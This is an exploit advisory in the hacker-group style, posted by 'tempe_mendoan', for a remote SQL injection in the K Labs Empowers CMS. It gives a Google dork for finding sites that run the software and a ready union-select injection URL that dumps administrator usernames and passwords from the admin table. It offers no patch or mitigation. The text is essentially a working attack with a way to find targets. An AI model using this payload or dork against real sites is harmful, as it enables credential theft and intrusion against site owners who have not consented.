K Labs Empowers suffers from a remote SQL injection vulnerability.
00b7f605544886c275266536a41562e767219bbef092ede519441ef2e3ed1283
.___ .___ .__ _________ .___
| | ____ __| _/ ____ ____ ____ ______|__|_____ ____ \_ ___ \ ____ __| _/ ____ _______
| | / \ / __ | / _ \ / \ _/ __ \ / ___/| |\__ \ / \ / \ \/ / _ \ / __ | _/ __ \ \_ __ \
| || | \/ /_/ | ( <_> )| | \\ ___/ \___ \ | | / __ \_| | \\ \____( <_> )/ /_/ | \ ___/ | | \/
|___||___| /\____ | \____/ |___| / \___ >/____ >|__|(____ /|___| / \______ / \____/ \____ | \___ > |__|
\/ \/ \/ \/ \/ \/ \/ \/ \/ \/
[~]===========================================================================[~]
[~]Title : K Labs Empowers Sql injection Vulnerability
[~]Vendor : http://www.klabsindia.com/mindex.html
[~]Author : tempe_mendoan
[~]Contact : http://indonesiancoder.com/
[~]Google Dork : "Powered By - K Labs"
[~]Google Dork : Jakarta , Indonesia ( Februari 2012 )
[~]===========================================================================[~]
#################################################################################
===[ Example Exploit ]===
[?] http://localhost/index.php?id=-19+union+select+0,unhex(hex(group_concat(username,0x3a,password))),2,3,4,5,6,7,8,9,10+from+admin--
##################################################################################
Greats T0 :
./ And All My Friend
Note :
./ I Love You Dila :*